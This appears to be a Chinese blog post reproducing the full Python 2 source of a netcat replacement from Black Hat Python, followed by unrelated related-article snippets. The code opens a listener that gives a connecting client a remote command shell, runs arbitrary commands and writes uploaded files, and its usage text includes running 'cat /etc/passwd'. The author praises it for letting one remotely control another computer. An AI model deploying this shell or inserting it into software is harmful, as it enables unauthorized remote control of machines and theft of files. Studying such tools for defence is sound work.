python实现netcat部分功能源代码
#!/opt/local/bin/python2.7 import sys import socket import getopt import threading import subprocess # define some global variables listen = False command = False upload = False execute = "" target = "" upload_destination = "" port = 0 # this runs a command and returns the output def run_command(command): # trim the newline command = command.rstrip() # run the command and get the output back try: output = subprocess.check_output(command, stderr=subprocess.STDOUT, shell=True) except: output = "Failed to execute command.\r\n" # send the output back to the client return output # this handles incoming client connections def client_handler(client_socket): global upload global execute global command # check for upload if len(upload_destination): # read in all of the bytes and write to our destination file_buffer = "" # keep reading data until none is available while True: data = client_socket.recv(1024) if not data: break else: file_buffer += data # now we take these bytes and try to write them out try: file_descriptor = open(upload_destination, "wb") file_descriptor.write(file_buffer) file_descriptor.close() # acknowledge that we wrote the file out client_socket.send("Successfully saved file to %s\r\n" % upload_destination) except: client_socket.send("Failed to save file to %s\r\n" % upload_destination) # check for command execution if len(execute): # run the command output = run_command(execute) client_socket.send(output) # now we go into another loop if a command shell was requested if command: while True: # show a simple prompt client_socket.send("<BHP:#> ") # now we receive until we see a linefeed (enter key) cmd_buffer = "" while "\n" not in cmd_buffer: cmd_buffer += client_socket.recv(1024) # we have a valid command so execute it and send back the results response = run_command(cmd_buffer) # send back the response client_socket.send(response) # this is for incoming connections def server_loop(): global target global port # if no target is defined we listen on all interfaces if not len(target): target = "0.0.0.0" server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) server.bind((target, port)) server.listen(5) while True: client_socket, addr = server.accept() # spin off a thread to handle our new client client_thread = threading.Thread(target=client_handler, args=(client_socket,)) client_thread.start() # if we don't listen we are a client....make it so. def client_sender(buffer): client = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: # connect to our target host client.connect((target, port)) # if we detect input from stdin send it # if not we are going to wait for the user to punch some in if len(buffer): client.send(buffer) while True: # now wait for data back recv_len = 1 response = "" while recv_len: data = client.recv(4096) recv_len = len(data) response += data if recv_len < 4096: break print response, # wait for more input buffer = raw_input("") buffer += "\n" # send it off client.send(buffer) except: # just catch generic errors - you can do your homework to beef this up print "[*] Exception! Exiting." # teardown the connection client.close() def usage(): print "Netcat Replacement" print print "Usage: bhpnet.py -t target_host -p port" print "-l --listen - listen on [host]:[port] for incoming connections" print "-e --execute=file_to_run - execute the given file upon receiving a connection" print "-c --command - initialize a command shell" print "-u --upload=destination - upon receiving connection upload a file and write to [destination]" print print print "Examples: " print "bhpnet.py -t 192.168.0.1 -p 5555 -l -c" print "bhpnet.py -t 192.168.0.1 -p 5555 -l -u=c:\\target.exe" print "bhpnet.py -t 192.168.0.1 -p 5555 -l -e=\"cat /etc/passwd\"" print "echo 'ABCDEFGHI' | ./bhpnet.py -t 192.168.11.12 -p 135" sys.exit(0) def main(): global listen global port global execute global command global upload_destination global target if not len(sys.argv[1:]): usage() # read the commandline options try: opts, args = getopt.getopt(sys.argv[1:], "hle:t:p:cu:", ["help", "listen", "execute", "target", "port", "command", "upload"]) except getopt.GetoptError as err: print str(err) usage() for o, a in opts: if o in ("-h", "--help"): usage() elif o in ("-l", "--listen"): listen = True elif o in ("-e", "--execute"): execute = a elif o in ("-c", "--commandshell"): command = True elif o in ("-u", "--upload"): upload_destination = a elif o in ("-t", "--target"): target = a elif o in ("-p", "--port"): port = int(a) else: assert False, "Unhandled Option" # are we going to listen or just send data from stdin if not listen and len(target) and port > 0: # read in the buffer from the commandline # this will block, so send CTRL-D if not sending input # to stdin buffer = sys.stdin.read() # send data off client_sender(buffer) # we are going to listen and potentially # upload things, execute commands and drop a shell back # depending on our command line options above if listen: server_loop() main()
这段代码是我至今看到的最骚的一段代码了,贼牛逼。这段代码即使一个套接子的客户端,又是一个套接字的服务端,可以利用shell远程控制对方的计算机。
for example
首先执行python test.py -l -p 9999,用作一个服务端
然后执行python test.py -t localhost -p 9999
然后按下ctrl+d,就可以输入命令了,是不是贼强,我在去把代码精读一下。
python实现netcat部分功能源代码的更多相关文章
- [AS3]as3画笔实例实现橡皮擦功能源代码
[AS3]as3画笔实例实现橡皮擦功能源代码 //主容器 var main:Sprite = new Sprite(); main.mouseEnabled = false; addChild(mai ...
- Atitit php java python nodejs错误日志功能的比较
Atitit php java python nodejs错误日志功能的比较 1.1. Php方案 自带 1 1.2. Java解决方案 SLF4J 1 1.3. Python解决方案 自带lo ...
- Python实现进度条功能
Python实现进度条功能 import sys, time def progress(percent, width=50): # 设置进度条的宽度 if percent >= 100: # 当 ...
- python实现简单爬虫功能
在我们日常上网浏览网页的时候,经常会看到一些好看的图片,我们就希望把这些图片保存下载,或者用户用来做桌面壁纸,或者用来做设计的素材. 我们最常规的做法就是通过鼠标右键,选择另存为.但有些图片鼠标右键的 ...
- [python爬虫]简单爬虫功能
在我们日常上网浏览网页的时候,经常会看到某个网站中一些好看的图片,它们可能存在在很多页面当中,我们就希望把这些图片保存下载,或者用户用来做桌面壁纸,或者用来做设计的素材. 我们最常规的做法就是通过鼠标 ...
- Python:安装mssql模块功能,并实现与sqlserver连接、查询
由于我系统是x64系统,所以下载python2.7 x64.下载地址:https://www.python.org/downloads/release/python-2712/, 经过测试发现这个版本 ...
- python10min系列之面试题解析:python实现tail -f功能
同步发布在github上,跪求star 这篇文章最初是因为reboot的群里,有人去面试,笔试题有这个题,不知道怎么做,什么思路,就发群里大家讨论 我想了一下,简单说一下我的想法吧,当然,也有很好用的 ...
- Python实现脚本锁功能,同时只能执行一个脚本
1. 文件锁 脚本启动前检查特定文件是否存在,不存在就启动并新建文件,脚本结束后删掉特定文件. 通过文件的判断来确定脚本是否正在执行. 方法实现也比较简单,这里以python脚本为例 #coding= ...
- python查询修改配置文件功能
阅读目录 一.python查询功能代码 1.查询修改配置文件 global log 127.0.0.1 local2 daemon maxconn 256 log 127.0.0.1 local2 i ...
随机推荐
- VMware Workstation 11 搭建windows server 2012 之sql server 2012集群常见问题整理
1.windows server 2012内置支持iSCSI发起程序无需额外安装,iSCSI Software Target 可作为“文件和存储服务”角色下的内置功能使用 2.拷贝虚拟机的文件加入域时 ...
- centos7 安装gitlab任意版本
主要还是根据官网:https://www.gitlab.cc/installation/#centos-7 1.安装依赖: sudo yum install curl policycoreutils ...
- profile default
SAPDBHOST = 10.199.0.26 j2ee/dbtype = hdb j2ee/dbname = ISD j2ee/dbhost = 10.199.0.26 dbs/hdb/dbname ...
- python3 json.dump乱码问题
json.dumps(obj, ensure_ascii=False) ensure_ascii = True,会忽略掉non-ascii字符
- maven项目发布到tomcat的错误
Could not publish to the server. java.lang.IndexOutOfBoundsException "Updating status for Tomca ...
- 最流行的Python编辑器/IDEs你认识吗?
来源商业新知网,原标题:来!带你认识几种最流行的Python编辑器/IDEs(附链接) 大数据文摘授权转载自数据派THU 作者:By Gregory Piatetsky 格雷戈里·皮亚特斯基,KDnu ...
- Setting up Scatter for Web Applications
[Setting up Scatter for Web Applications] If you are still using scatter-js please move over to scat ...
- Deploy, Issue and Transfer Tokens
[Deploy, Issue and Transfer Tokens] 本例使用 eosio.token 合约来尝试发行Token. 1.签出 eosio.contracts. git clone h ...
- 图像的几何变换——OpenCV-Python Tutorials
原文地址http://opencv-python-tutroals.readthedocs.io/en/latest/py_tutorials/py_imgproc/py_geometric_tran ...
- 整合SpringMVC框架和Spring框架
-------------------------siwuxie095 整合 SpringMVC 框架和 Spring 框架 ...